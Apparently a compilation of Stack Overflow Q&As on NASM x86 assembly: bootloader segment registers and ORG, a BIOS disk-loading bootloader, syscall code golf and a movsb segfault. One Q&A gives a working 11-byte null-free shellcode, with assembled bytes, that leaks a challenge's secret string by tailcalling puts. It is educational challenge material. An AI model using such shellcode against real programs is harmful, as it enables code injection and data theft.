Setting segment registers after ORG instruction - nasm

I am currently following a tutorial on OS development, which includes a discussion on bootloaders.
My bootloader currently runs in 16-bit real mode, so I can use the BIOS interrupts (e.g. the VGA video interrupts).
The BIOS provides the video services interrupt 0x10. Its function 0x0E (teletype output) lets me print a character to the screen.
Here is this basic bootloader:
org 0x7c00 ; Set program start (origin) address location at 0x7c00.
; This program is loaded by the BIOS at 0x7c00.
bits 16 ; We live in 16-bit Real Mode.
start:
jmp loader
bootmsg db "Welcome to my Operating System!", 0 ; My data string.
;-------------------------------------------------------
; Description: Print a null-terminated string
;-------------------------------------------------------
print:
lodsb ; Load string byte at address DS:SI and place in AL.
; Then, increment/decrement SI as defined by the Direction Flag (DF) in FLAGS.
or al, al ; Set the zero flag - is AL zero?
jz printdone ; Check if this is the null byte
mov ah, 0eh
int 10h
jmp print
printdone:
ret
loader:
;|---------- Related to my question ----------|
xor ax, ax
mov ds, ax
mov es, ax
;|--------------------------------------------|
mov si, bootmsg
call print
cli ; Disable maskable interrupts.
hlt ; Halts the system.
times 510 - ($-$$) db 0 ; Make sure our bootloader is 512 bytes large.
dw 0xAA55 ; Boot signature - stored little-endian, so the byte at offset 510 is 0x55 and the byte at offset 511 is 0xAA, indicating a bootable disk.
As shown in the above code, I have highlighted the following three lines:
xor ax, ax
mov ds, ax
mov es, ax
According to the original source, it says the following:
Setup segments to insure they are 0. Remember that we have ORG 0x7c00. This means all addresses are based from 0x7c00:0. Because the data segments are within the same code segment, null em.
I am a bit confused. From my understanding, the org instruction tells the loader to load this program at address 0x7c00. Why don't we take this as our start address then? Meaning, our two overlapping Data and Code segments are not located at a base address of zero. The base address should be 0x7c0. Why does the author set the base address to 0x0?
mov ax, 07c0h
mov ds, ax
mov es, ax

I have been looking into the org instruction more and other documentation and I understand what is going on.
According to the NASM documentation on the org directive, short for origin:
The function of the ORG directive is to specify the origin address which NASM will assume the program begins at when it is loaded into memory. [...] NASM's ORG does exactly what the directive says: origin. Its sole function is to specify one offset which is added to all internal address references within the section.
Therefore, the NASM assembler assumes that the program will be loaded at the address specified with the origin directive (i.e. org). The BIOS does exactly this. According to the following, once the BIOS finds a boot sector that contains a valid boot signature, the bootloader will be "loaded into memory at 0x0000:0x7c00 (segment 0, address 0x7c00)."
From the quote above, when the NASM documentation says "internal address references," it is referring to all references to concrete memory regions that are being used in the code (e.g. referencing a label, etc.). For example, the line in the bootloader code above: mov si, bootmsg will resolve bootmsg to 0x07c00 + offset, where the offset is determined by the position of the first byte of my string bootmsg (i.e. 'W').
With my code above, if I disassemble the bin file using the ndisasm utility, I see the following:
00000000 EB2C jmp short 0x2e
00000002 57
00000003 656C
00000005 636F6D
00000008 6520746F
0000000C 206D79
0000000F 204F70
00000012 657261
00000015 7469
00000017 6E
00000018 67205379
0000001C 7374
0000001E 656D
00000020 2100
00000022 AC lodsb
00000023 08C0 or al,al
00000025 7406 jz 0x2d
00000027 B40E mov ah,0xe
00000029 CD10 int 0x10
0000002B EBF5 jmp short 0x22
0000002D C3 ret
0000002E 31C0 xor ax,ax
00000030 8ED8 mov ds,ax
00000032 8EC0 mov es,ax
00000034 BE027C mov si,0x7c02
00000037 E8E8FF call 0x22
0000003A FA cli
0000003B F4 hlt
00000... ... ...
(I removed the instructions that ndisasm generated for 0x00000002 to 0x00000020, because those bytes are my bootmsg string: data, not code.)
As the disassembly shows, at address 0x00000034 the label bootmsg has been replaced with 0x7c02 (i.e. 0x7c00 + offset 0x02).
Michael Petch provided some very solid insight too. It is a common misconception that the bootloader is loaded at 0x07c0:0x0000 (segment 0x07c0, offset 0). Although one could technically use this form, the convention is to use a segment of zero instead (it is good practice to set CS:IP explicitly at the very start of your boot sector). As Michael has mentioned, if one wants more information, look at section 4 of the following guide on segment offset addressing.
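To make the pairing between org and the segment registers concrete, here is a small Python sketch of the real-mode address arithmetic. It is only an illustration: the helper name physical and the variable names are mine, not from the tutorial, and the position 0x02 of bootmsg is taken from the disassembly above.

```python
def physical(segment: int, offset: int) -> int:
    """Real-mode address translation: segment * 16 + offset."""
    return (segment << 4) + offset

BOOTMSG_POS = 0x02  # position of bootmsg in the binary (right after the 2-byte jmp)

# org 0x7c00: NASM emits 0x7c00 + 0x02 as the offset, so DS has to be 0.
org_7c00_offset = 0x7C00 + BOOTMSG_POS
good = physical(0x0000, org_7c00_offset)

# org 0: NASM would emit just 0x02, so DS has to be 0x07c0.
also_good = physical(0x07C0, BOOTMSG_POS)

# Mixing org 0x7c00 with DS = 0x07c0 adds the 0x7c00 base twice.
bad = physical(0x07C0, org_7c00_offset)

print(hex(good), hex(also_good), hex(bad))
```

Both consistent pairings reach the same byte of the string, while the mixed pairing points somewhere else entirely. That is why the tutorial zeroes DS and ES when it uses org 0x7c00.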

Related

NASM ASSEMBLY - Print "Hello World"

I've created a string and I loop over it, moving each character into the al register so it can be printed to the screen. The problem is that the right number of characters gets printed, but they are gibberish. Can you please help me figure out what is wrong with the code? It would be highly appreciated.
org 0
bits 16
section .text
global _start
_start:
mov si, msg
loop:
inc si
mov ah, 0x0e
mov al, [si]
or al, al
jz end
mov bh, 0x00
int 0x10
jmp loop
end:
jmp .done
.done:
jmp $
msg db 'Hello, world!',0xa
len equ $ - msg
TIMES 510 - ($ - $$) db 0
DW 0xAA55
bootloader code
ORG 0x7c00
BITS 16
boot:
mov ah, 0x02
mov al, 0x01
mov ch, 0x00
mov cl, 0x02
mov dh, 0x00
mov dl, 0x00
mov bx, 0x1000
mov es, bx
int 0x13
jmp 0x1000:0x00
times 510 - ($ - $$) db 0
dw 0xAA55
The bootloader
Before tackling the kernel code, let's look at the bootloader that brings the kernel into memory.
You have written a very minimalistic version of a bootloader, one that omits much of the usual stuff like setting up segment registers, but thanks to its reduced nature that's not really a problem.
What could be a problem is that you wrote mov dl, 0x00, hardcoding a zero to select the first floppy as your bootdisk. No problem if this is indeed the case, but it would be much better to just use whatever value the BIOS preloaded the DL register with. That's the ID for the disk that holds your bootloader and kernel.
What is a problem is that you load the kernel to the segmented address 0x1000:0x1000 and then later jump to the segmented address 0x1000:0x0000 which is 4096 bytes short of the kernel. You got lucky that the kernel code did run in the end, thanks to the memory between these two addresses most probably being filled with zero-bytes that (two by two) translate into the instruction add [bx+si], al. Because you omitted setting up the DS segment register, we don't know what unlucky byte got overwritten so many times. Let's hope it was not an important byte...
mov bx, 0x1000
mov es, bx
xor bx, bx ; <== You forgot to write this instruction!
int 0x13
jmp 0x1000:0x0000
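The "4096 bytes short" figure can be checked with a few lines of Python. This is just a sketch of the arithmetic. It assumes, as the answer does, that the memory between the two addresses is filled with zero bytes, and the helper name physical is mine.

```python
def physical(segment: int, offset: int) -> int:
    """Real-mode address translation: segment * 16 + offset."""
    return segment * 16 + offset

load_addr = physical(0x1000, 0x1000)  # ES:BX as the original code left it (BX still 0x1000)
jump_addr = physical(0x1000, 0x0000)  # target of jmp 0x1000:0x0000

gap = load_addr - jump_addr           # bytes executed before reaching the kernel
zero_instructions = gap // 2          # each "add [bx+si], al" is the two bytes 00 00

print(hex(load_addr), hex(jump_addr), gap, zero_instructions)
```

With xor bx, bx in place, ES:BX becomes 0x1000:0x0000 and the gap disappears.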
What is a problem is that you ignore the possibility of encountering troubles when loading a sector from the disk. At the very least you should inspect the carry flag that the BIOS.ReadSector function 02h reports and if the flag is set you could abort cleanly. A more sophisticated approach would also retry a limited number of times, say 3 times.
ORG 0x7C00
BITS 16
; IN (dl)
mov dh, 0x00 ; DL is bootdrive
mov cx, 0x0002
mov bx, 0x1000
mov es, bx
xor bx, bx
mov ax, 0x0201 ; BIOS.ReadSector
int 0x13 ; -> AH CF
jc ERR
jmp 0x1000:0x0000
ERR:
cli
hlt
jmp ERR
times 510 - ($ - $$) db 0
dw 0xAA55
The kernel
After the jmp 0x1000:0x0000 instruction has brought you to the first instruction of your kernel, the CS code segment register holds the value 0x1000. None of the other segment registers changed, and since you did not set up any of them in the bootloader, we still don't know what any of them contain. However, in order to retrieve the bytes from the message at msg with the mov al, [si] instruction, we need a correct value for the DS data segment register. In accordance with the ORG 0 directive, the correct value is the one we already have in CS. Just two 1-byte instructions are needed: push cs followed by pop ds.
There's more to be said about the kernel code:
The printing loop uses a pre-increment on the pointer in the SI register. Because of this the first character of the string will not get displayed. You could compensate for this via mov si, msg - 1.
The printing loop processes a zero-terminated string. You don't need that len equate. What you do need is an explicit zero byte that terminates the string. You should not rely on the large number of zero bytes that times produced. In some future version of the code there might be no zero byte at all!
You (think you) have included a newline (0xa) in the string. For the BIOS.Teletype function 0Eh, this is merely a linefeed that moves down on the screen. To obtain a newline, you need to include both carriage return (13) and linefeed (10).
There's no reason for your kernel code to have the bootsector signature bytes at offset 510. Depending on how you get this code to the disk, it might be necessary to pad the code up to (a multiple of) 512, so keep times 512 - ($ - $$) db 0.
The kernel:
ORG 0
BITS 16
section .text
global _start
_start:
push cs
pop ds
mov si, msg
mov bx, 0x0007 ; DisplayPage=0, GraphicsColor=7 (White)
jmp BeginLoop
PrintLoop:
mov ah, 0x0E ; BIOS.Teletype
int 0x10
BeginLoop:
mov al, [si]
inc si
test al, al
jnz PrintLoop
cli
hlt
jmp $-2
msg db 'Hello, world!', 13, 10, 0
TIMES 512 - ($ - $$) db 0

Compact shellcode to print a 0-terminated string pointed-to by a register, given puts or printf at known absolute addresses?

Background: I am a beginner trying to understand how to golf assembly, in particular to solve an online challenge.
EDIT: clarification: I want to print the string at the memory address held in RDX, i.e. "SUPER SECRET!"
Create some shellcode that can output the value of register RDX in <= 11 bytes. Null bytes are not allowed.
The program is linked against the C standard library, so I have access to the puts / printf functions. It's running on x86-64 (amd64).
$rax : 0x0000000000010000 → 0x0000000ac343db31
$rdx : 0x0000555555559480 → "SUPER SECRET!"
gef➤ info address puts
Symbol "puts" is at 0x7ffff7e3c5a0 in a file compiled without debugging.
gef➤ info address printf
Symbol "printf" is at 0x7ffff7e19e10 in a file compiled without debugging.
Here is my attempt (intel syntax)
xor ebx, ebx ; zero the ebx register
inc ebx ; set the ebx register to 1 (STDOUT)
xchg ecx, edx ; set the ECX register to RDX
mov edx, 0xff ; set the length to 255
mov eax, 0x4 ; set the syscall to print
int 0x80 ; interrupt
My attempt is 17 bytes and includes null bytes, which aren't allowed. What other ways can I lower the byte count? Is there a way to call puts / printf while still saving bytes?
FULL DETAILS:
I am not quite sure what is useful information and what isn't.
File details:
ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5810a6deb6546900ba259a5fef69e1415501b0e6, not stripped
Source code:
void main() {
char* flag = get_flag(); // I don't get access to the function details
char* shellcode = (char*) mmap((void*) 0x1337,12, 0, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
mprotect(shellcode, 12, PROT_READ | PROT_WRITE | PROT_EXEC);
fgets(shellcode, 12, stdin);
((void (*)(char*))shellcode)(flag);
}
Disassembly of main:
gef➤ disass main
Dump of assembler code for function main:
0x00005555555551de <+0>: push rbp
0x00005555555551df <+1>: mov rbp,rsp
=> 0x00005555555551e2 <+4>: sub rsp,0x10
0x00005555555551e6 <+8>: mov eax,0x0
0x00005555555551eb <+13>: call 0x555555555185 <get_flag>
0x00005555555551f0 <+18>: mov QWORD PTR [rbp-0x8],rax
0x00005555555551f4 <+22>: mov r9d,0x0
0x00005555555551fa <+28>: mov r8d,0xffffffff
0x0000555555555200 <+34>: mov ecx,0x22
0x0000555555555205 <+39>: mov edx,0x0
0x000055555555520a <+44>: mov esi,0xc
0x000055555555520f <+49>: mov edi,0x1337
0x0000555555555214 <+54>: call 0x555555555030 <mmap@plt>
0x0000555555555219 <+59>: mov QWORD PTR [rbp-0x10],rax
0x000055555555521d <+63>: mov rax,QWORD PTR [rbp-0x10]
0x0000555555555221 <+67>: mov edx,0x7
0x0000555555555226 <+72>: mov esi,0xc
0x000055555555522b <+77>: mov rdi,rax
0x000055555555522e <+80>: call 0x555555555060 <mprotect@plt>
0x0000555555555233 <+85>: mov rdx,QWORD PTR [rip+0x2e26] # 0x555555558060 <stdin@@GLIBC_2.2.5>
0x000055555555523a <+92>: mov rax,QWORD PTR [rbp-0x10]
0x000055555555523e <+96>: mov esi,0xc
0x0000555555555243 <+101>: mov rdi,rax
0x0000555555555246 <+104>: call 0x555555555040 <fgets@plt>
0x000055555555524b <+109>: mov rax,QWORD PTR [rbp-0x10]
0x000055555555524f <+113>: mov rdx,QWORD PTR [rbp-0x8]
0x0000555555555253 <+117>: mov rdi,rdx
0x0000555555555256 <+120>: call rax
0x0000555555555258 <+122>: nop
0x0000555555555259 <+123>: leave
0x000055555555525a <+124>: ret
Register state right before shellcode is executed:
$rax : 0x0000000000010000 → "EXPLOIT\n"
$rbx : 0x0000555555555260 → <__libc_csu_init+0> push r15
$rcx : 0x000055555555a4e8 → 0x0000000000000000
$rdx : 0x0000555555559480 → "SUPER SECRET!"
$rsp : 0x00007fffffffd940 → 0x0000000000010000 → "EXPLOIT\n"
$rbp : 0x00007fffffffd950 → 0x0000000000000000
$rsi : 0x4f4c5058
$rdi : 0x00007ffff7fa34d0 → 0x0000000000000000
$rip : 0x0000555555555253 → <main+117> mov rdi, rdx
$r8 : 0x0000000000010000 → "EXPLOIT\n"
$r9 : 0x7c
$r10 : 0x000055555555448f → "mprotect"
$r11 : 0x246
$r12 : 0x00005555555550a0 → <_start+0> xor ebp, ebp
$r13 : 0x00007fffffffda40 → 0x0000000000000001
$r14 : 0x0
$r15 : 0x0
(This register state is a snapshot at the assembly line below)
●→ 0x555555555253 <main+117> mov rdi, rdx
0x555555555256 <main+120> call rax
Since I already spilled the beans and "spoiled" the answer to the online challenge in comments, I might as well write it up. 2 key tricks:
Create 0x7ffff7e3c5a0 (&puts) in a register with lea reg, [reg + disp32], using the known value of RDI which is within the +-2^31 range of a disp32. (Or use RBP as a starting point, but not RSP: that would need a SIB byte in the addressing mode).
This is a generalization of the code-golf trick of using lea edi, [rax+1] to create small constants from other small constants (especially 0) in 3 bytes, with code that runs less slowly than push imm8 / pop reg.
The disp32 is large enough to not have any zero bytes; you have a couple registers to choose from in case one had been too close.
Copy a 64-bit register in 2 bytes with push reg / pop reg, instead of 3-byte mov rdi, rdx (REX + opcode + modrm). No savings if either push needs a REX prefix (for R8..R15), and actually costs bytes if both are "non-legacy" registers.
See other answers on Tips for golfing in x86/x64 machine code on codegolf.SE for more.
bits 64
lea rsi, [rdi - 0x166f30]
;; add rbp, imm32 ; alternative, but that would mess up a call-preserved register so we might crash on return.
push rdx
pop rdi ; copy RDX to first arg, x86-64 SysV calling convention
jmp rsi ; tailcall puts
This is exactly 11 bytes, and I don't see a way for it to be smaller. add r64, imm32 is also 7 bytes, same as LEA. (Or 6 bytes if the register is RAX, but even the xchg rax, rdi short form would cost 2 bytes to get it there, and the RAX value is still the fgets return value, which is the small mmap buffer address.)
The puts function pointer doesn't fit in 32 bits, so we need a REX prefix on any instruction that puts it into a register. Otherwise we could just mov reg, imm32 (5 bytes) with the absolute address, not deriving it from another register.
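As a cross-check of the arithmetic behind the lea trick, here is a short Python sketch that derives the disp32 from the addresses in the question's GDB session and assembles the 11 bytes by hand. The constant names are mine. The opcode bytes are the ones NASM emits for these four instructions, and the "forbidden" set reflects the challenge rule (no zero bytes) plus the newline that would end the fgets read early.

```python
import struct

PUTS = 0x7FFFF7E3C5A0  # "info address puts" in the question
RDI = 0x7FFFF7FA34D0   # RDI in the question's register dump

disp = PUTS - RDI
assert -2**31 <= disp < 2**31            # must fit in a signed disp32
disp_bytes = struct.pack("<i", disp)     # little-endian, two's complement

shellcode = (
    bytes([0x48, 0x8D, 0xB7]) + disp_bytes  # lea rsi, [rdi + disp32]
    + bytes([0x52])                         # push rdx
    + bytes([0x5F])                         # pop rdi
    + bytes([0xFF, 0xE6])                   # jmp rsi
)

forbidden = {0x00, 0x0A}                 # NUL (challenge rule) and newline (stops fgets)
clean = not (forbidden & set(shellcode))

print(hex(disp), shellcode.hex(), len(shellcode), clean)
```

If the disp32 had contained a forbidden byte, the same calculation could be repeated with RBP as the base register instead.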
$ nasm -fbin -o exploit.bin -l /dev/stdout exploit.asm
1 bits 64
2 00000000 488DB7D090E9FF lea rsi, [rdi - 0x166f30]
3 ;; add rbp, imm32 ; we can avoid messing up any call-preserved registers
4 00000007 52 push rdx
5 00000008 5F pop rdi ; copy to first arg
6 00000009 FFE6 jmp rsi ; tailcall
$ ll exploit.bin
-rw-r--r-- 1 peter peter 11 Apr 24 04:09 exploit.bin
$ ./a.out < exploit.bin # would work if the addresses in my build matched yours
My build of your incomplete .c uses different addresses on my machine, but it does reach this code (at address 0x10000, mmap_min_addr, which mmap picks after the amusing choice of 0x1337 as a hint address; that isn't even page-aligned but doesn't result in EINVAL on current Linux).
Since we only tailcall puts with correct stack alignment and don't modify any call-preserved registers, this should successfully return to main.
Note that 0 bytes (ASCII NUL, not NULL) would actually work in shellcode for this test program, if not for the requirement that forbids it.
The input is read using fgets (apparently to simulate a gets() overflow).
fgets actually can read a 0 aka '\0'; the only critical character is 0xa aka '\n' newline. See Is it possible to read null characters correctly using fgets or gets_s?
Often buffer overflows exploit a strcpy or something else that stops on a 0 byte, but fgets only stops on EOF or newline. (Or the buffer size, a feature gets is missing, hence its deprecation and removal from even the ISO C standard library! It's literally impossible to use safely unless you control the input data). So yes, it's totally normal to forbid zero bytes.
BTW, your int 0x80 attempt is not viable: What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? - you can't use the 32-bit ABI to pass 64-bit pointers to write, and the string you want to output is not in the low 32 bits of virtual address space.
Of course, with the 64-bit syscall ABI, you're fine if you can hardcode the length.
push rdx
pop rsi
shr eax, 16 ; fun 3-byte way to turn 0x10000 into 1 (__NR_write, 64-bit), instead of just push 1 / pop
mov edi, eax ; STDOUT_FD = __NR_write
lea edx, [rax + 13 - 1] ; 3 bytes. RDX = 13 = string length
; or mov dl, 0xff ; 2 bytes leaving garbage in rest of RDX
syscall
But this is 12 bytes, as well as hard-coding the length of the string (which was supposed to be part of the secret?).
mov dl, 0xff could make sure the length was at least 255, and actually much more in this case, if you don't mind getting reams of garbage after the string you want, until write hits an unmapped page and returns early. That would save a byte, making this 11.
(Fun fact, Linux write does not return an error when it's successfully written some bytes; instead it returns how many it did write. If you try again with buf + write_len, you would get a -EFAULT return value for passing a bad pointer to write.)

Print newline with as little code as possible with NASM

I'm learning a bit of assembly for fun and I am probably too green to know the right terminology and find the answer myself.
I want to print a newline at the end of my program.
Below works fine.
section .data
newline db 10
section .text
_end:
mov rax, 1
mov rdi, 1
mov rsi, newline
mov rdx, 1
syscall
mov rax, 60
mov rdi, 0
syscall
But I'm hoping to achieve the same result without defining the newline in .data. Is it possible to call sys_write directly with the byte you want, or must it always be done with a reference to some predefined data (which I assume is what mov rsi, newline is doing)?
In short, why can't I replace mov rsi, newline by mov rsi, 10?
You always need the data in memory to copy it to a file-descriptor. There is no system-call equivalent of C stdio fputc that takes data by value instead of by pointer.
mov rsi, newline puts a pointer into a register (with a huge mov r64, imm64 instruction). sys_write doesn't special-case size=1 and treat its void *buf arg as a char value if it's not a valid pointer.
There aren't any other system calls that would do the trick. pwrite and writev are both more complicated (taking a file offset as well as a pointer, or taking an array of pointer+length to gather the data in kernel space).
There is a lot you can do to optimize this for code-size, though. See https://codegolf.stackexchange.com/questions/132981/tips-for-golfing-in-x86-x64-machine-code
First, putting the newline character in static storage means you need to generate a static address in a register. Your options here are:
5-byte mov esi, imm32 (only in Linux non-PIE executables, so static addresses are link-time constants and are known to be in the low 2GiB of virtual address space and thus work as 32-bit zero-extended or sign-extended)
7-byte lea rsi, [rel newline] Works everywhere, the only good option if you can't use the 5-byte mov-immediate.
10-byte mov rsi, imm64. This works even in PIE executables (e.g. if you link with gcc -nostdlib without -static, on a distro where PIE is the default.) But only via a runtime relocation fixup, and the code-size is terrible. Compilers never use this because it's not faster than LEA.
But like I said, we can avoid static addressing entirely: Use push to put immediate data on the stack. This works even if we need zero-terminated strings, because push imm8 and push imm32 both sign-extend the immediate to 64-bit. Since ASCII uses the low half of the 0..255 range, this is equivalent to zero-extension.
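To illustrate the sign-extension point, this Python sketch models the 8 bytes that a push imm8 leaves on the stack in 64-bit mode. The helper names sign_extend and pushed_qword are mine. It is a model of the described behaviour, not something that touches a real stack.

```python
import struct

def sign_extend(value: int, bits: int) -> int:
    """Interpret the low `bits` bits of value as a two's-complement number."""
    value &= (1 << bits) - 1
    return value - (1 << bits) if value & (1 << (bits - 1)) else value

def pushed_qword(imm8: int) -> bytes:
    """The 8 bytes that `push imm8` stores at [rsp], in memory (little-endian) order."""
    return struct.pack("<q", sign_extend(imm8, 8))

print(pushed_qword(0x0A))  # ASCII newline: the upper seven bytes are zero
print(pushed_qword(0x80))  # outside ASCII: the upper seven bytes become 0xff
```

For any ASCII character the first byte is the character and the next byte is already a zero terminator, which is why the pushed value can double as a tiny C string.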
Then we just need to copy RSP to RSI, because push leaves RSP pointing to the data that was pushed. mov rsi, rsp would be 3 bytes because it needs a REX prefix. If you were targeting 32-bit code or the x32 ABI (32-bit pointers in long mode) you could use 2-byte mov esi, esp. But Linux puts the stack pointer at top of user virtual address space, so on x86-64 that's 0x007ff..., right at the top of the low canonical range. So truncating a pointer to stack memory to 32 bits isn't an option; we'd get -EFAULT.
But we can copy a 64-bit register with 1-byte push + 1-byte pop. (Assuming neither register needs a REX prefix to access.)
default rel ; We don't use any explicit addressing modes, but no reason to leave this out.
_start:
push 10 ; \n
push rsp
pop rsi ; 2 bytes total vs. 3 for mov rsi,rsp
push 1 ; __NR_write call number
pop rax ; 3 bytes, vs. 5 for mov eax, 1
mov edx, eax ; length = call number by coincidence
mov edi, eax ; fd = length = call number also coincidence
syscall ; write(1, "\n", 1)
mov al, 60 ; assuming write didn't return -errno, replace the low byte and keep the high zeros
;xor edi, edi ; leave rdi = 1 from write
syscall ; _exit(1)
.size: db $ - _start
xor-zeroing is the most well-known x86 peephole optimization: it saves 3 bytes of code size, and is actually more efficient than mov edi, 0. But you only asked for the smallest code to print a newline, without specifying that it had to exit with status = 0. So we can save 2 bytes by leaving that out.
Since we're just making an _exit system call, we don't need to clean up the stack from the 10 we pushed.
BTW, this will crash if the write returns an error. (e.g. redirected to /dev/full, or closed with ./newline >&-, or whatever other condition.) That would leave RAX=-something, so mov al, 60 would give us RAX=0xffff...3c. Then we'd get -ENOSYS from the invalid call number, and fall off the end of _start and decode whatever is next as instructions. (Probably zero bytes which decode with [rax] as an addressing mode. Then we'd fault with a SIGSEGV.)
objdump -d -Mintel disassembly of that code, after building with nasm -felf64 and linking with ld
0000000000401000 <_start>:
401000: 6a 0a push 0xa
401002: 54 push rsp
401003: 5e pop rsi
401004: 6a 01 push 0x1
401006: 58 pop rax
401007: 89 c2 mov edx,eax
401009: 89 c7 mov edi,eax
40100b: 0f 05 syscall
40100d: b0 3c mov al,0x3c
40100f: 0f 05 syscall
0000000000401011 <_start.size>:
401011: 11 .byte 0x11
So the total code-size is 0x11 = 17 bytes. vs. your version with 39 bytes of code + 1 byte of static data. Your first 3 mov instructions alone are 5, 5, and 10 bytes long. (Or 7 bytes long for mov rax,1 if you use YASM which doesn't optimize it to mov eax,1).
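The byte counts can be tallied from the objdump listing with a few lines of Python. This is only a sketch. The hex bytes are copied from the disassembly above, and the per-instruction sizes for the original version are the ones stated in this answer (5, 5, 10, 5, 2, 5, 5, 2), plus the 1 byte of static data.

```python
# Machine code bytes of the golfed version, one instruction per line.
listing = """
6a 0a
54
5e
6a 01
58
89 c2
89 c7
0f 05
b0 3c
0f 05
"""
golfed = bytes.fromhex("".join(listing.split()))

# mov rax,1 / mov rdi,1 / mov rsi,newline / mov rdx,1 / syscall /
# mov rax,60 / mov rdi,0 / syscall, then 1 byte of data for the newline.
original_sizes = [5, 5, 10, 5, 2, 5, 5, 2]
original_total = sum(original_sizes) + 1

print(len(golfed), original_total, original_total - len(golfed))
```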
Running it:
$ strace ./newline
execve("./newline", ["./newline"], 0x7ffd4e98d3f0 /* 54 vars */) = 0
write(1, "\n", 1
) = 1
exit(1) = ?
+++ exited with 1 +++
If this was part of a larger program:
If you already have a pointer to some nearby static data in a register, you could do something like a 4-byte lea rsi, [rdx + newline-foo] (REX.W + opcode + modrm + disp8), assuming the newline-foo offset fits in a sign-extended disp8 and that RDX holds the address of foo.
Then you can have newline: db 10 in static storage after all. (Put it in .rodata or .data, depending on which section you already had a pointer to).
sys_write expects the address of the string in the rsi register, not the character or string itself.
mov rsi, newline loads the address of newline into rsi.

Segmentation fault movsb nasm in 64 bits linux

I'm new to asm and am trying out some opcodes to get hands-on experience.
I'm working on 64-bit Linux and always get a segmentation fault when using movsb. I assemble with nasm:
nasm -f elf64 test.asm
Here is the code
DEFAULT ABS
segment data
data:
texte: db 'Hello, World !!', 10, 13
len: equ $-texte
texteBis: db 'Hello, World !.', 10, 13
segment code
global main
main:
;The problem is here
mov rsi, texteBis
mov rdi, texte
mov cx, len
rep movsb
mov dx, len
mov rcx, texte
mov bx, 1
mov ax, 4
int 0x80
mov bx,0 ; exit code, 0=normal
mov ax,1 ; exit command to kernel
int 0x80 ; interrupt 80 hex, call kernel
Another question: with a string (or another large db instance), should I use
mov rsi, texte
or
mov rsi, [texte]
I didn't understand which one gives the value and which one the address.
Do you also link?
ld -e main test.o -o test
Anyways, texteBis seems to be static data, in the data segment. That page is read-only and protected for writing/execution.
You should allocate a buffer (either on the stack or on the heap if you are allowed to use a runtime library).
Your problem is that you are writing to write-protected memory, i.e. the DATA section. Once your program gets loaded into the memory, the DATA section is actually on a read-only page. You have to use stack memory (or dynamically allocated memory) and use that as the destination of your string copy.
Example:
sub rsp, len ; move stack pointer down 'len' bytes
mov rsi, texteBis
mov rdi, rsp ; use address of stack pointer as dest.
xor rcx,rcx ; cx = 0
mov cx, len
rep movsb
That should fix your problem. As in C, it is important to allocate enough space or you will overwrite data on the stack.
Assigning values to registers
Another thing that I noticed is that you often write to sub-parts of registers, e.g.
mov dx, len
This is dangerous since the other parts of the register are not overwritten. Only the lowest 16 bits of the register are written. Say rdx, a 64-bit register, was set to 0xffffffffffffffff. Then rdx would look like this after your move: 0xffffffffffff0011. The called code probably reads rdx completely and therefore interprets a length of 0xffffffffffff0011 bytes. Not what you want. Solution:
xor rdx,rdx
mov dx, len
or
mov rdx, len
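The effect of a partial register write can be modelled in a few lines of Python. This is a sketch of the semantics, not real register access, and the function names are mine. It also shows one fact not stated above: on x86-64, writing a 32-bit register such as edx zeroes the upper 32 bits, so mov edx, len would work as well.

```python
MASK64 = (1 << 64) - 1

def write_reg16(reg64: int, value: int) -> int:
    """Model of `mov dx, imm16`: replaces bits 0..15, keeps bits 16..63."""
    return (reg64 & ~0xFFFF & MASK64) | (value & 0xFFFF)

def write_reg32(reg64: int, value: int) -> int:
    """Model of `mov edx, imm32`: writes bits 0..31 and zeroes bits 32..63."""
    return value & 0xFFFFFFFF

rdx = 0xFFFFFFFFFFFFFFFF  # stale contents before the move
LEN = 0x11                # len of texte: 15 characters plus 10 and 13

print(hex(write_reg16(rdx, LEN)))  # upper 48 bits survive
print(hex(write_reg32(rdx, LEN)))  # upper 32 bits are cleared
```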
Tools that might help you later
Note, gdb will help you find where your error is happening and will also give you additional information (such as register values and stack values). Excerpt:
Program received signal SIGSEGV, Segmentation fault.
0x00000000004005bb in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x00000000004005a6: sub $0x13,%rsp
0x00000000004005aa: mov -0x1c(%rip),%rsi # 0x400595
0x00000000004005b1: mov %rsp,%rdi
0x00000000004005b4: xor %cx,%cx
0x00000000004005b7: mov $0x11,%cx
=> 0x00000000004005bb: rep movsb %ds:(%rsi),%es:(%rdi)
0x00000000004005bd: mov $0x11,%dx
0x00000000004005c1: movabs $0x400584,%rcx
0x00000000004005cb: mov $0x1,%bx
0x00000000004005cf: mov $0x4,%ax
0x00000000004005d3: int $0x80
0x00000000004005d5: mov $0x0,%bx
0x00000000004005d9: mov $0x1,%ax
0x00000000004005dd: int $0x80
End of assembler dump.
(gdb) info registers rsi
rsi 0x57202c6f6c6c6548 6278066737626506568
Since nasm does not support a useful debugging format but it is often the case that you want to break on certain occasions, you can use the int3 instruction to raise a SIGTRAP at a certain point in the code:
mov eax, 10
int3 ; debugger will catch signal here
Hope that helps getting you started in assembly.
You don't need to use dynamic memory. Your data segment (or section) is read-only because it is not a standard section name and you are not defining its attributes, so by default nasm treats it as a read-only data section.
Using objdump -h with your code outputs the following:
0 data 00000022 0000000000000000 0000000000000000 00000200 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1 code 0000003c 0000000000000000 0000000000000000 00000230 2**0
CONTENTS, ALLOC, LOAD, RELOC, READONLY, DATA
If you change the names of your segments to .data and .text, the program runs perfectly and objdump outputs:
0 .data 00000022 0000000000000000 0000000000000000 00000200 2**2
CONTENTS, ALLOC, LOAD, DATA
1 .text 0000003c 0000000000000000 0000000000000000 00000230 2**4
CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
Which are the correct attributes for what you intend with your sections.
To get more info on what the attributes mean, I recommend this page:
https://www.tortall.net/projects/yasm/manual/html/objfmt-elf-section.html

Boot time program running on virtual computer without OS

For a school assignment I have to write the program described below, and I would really like some help on how to approach this problem. To be clear, I don't want you to solve this, I just want some guidance on how to do it.
Problem:
Write a boot time program, which will be run in a virtual computer without an operating system. The program has to print out your name and the words "ALT key is pressed" or "ALT key is not pressed" according to status of the ALT key.
Additional hints:
- the program has to be written in 16 bit mode
- compiled program including its data must be less than 510 bytes in size
- directive "org 0x7c00" specifies the correct address in the memory where the program is loaded
- write instructions before the data
- program should execute in an endless loop
- there is no printf function, you will have to use interrupt 0x10
- to read the state of the alt keys you can use the interrupt 0x16
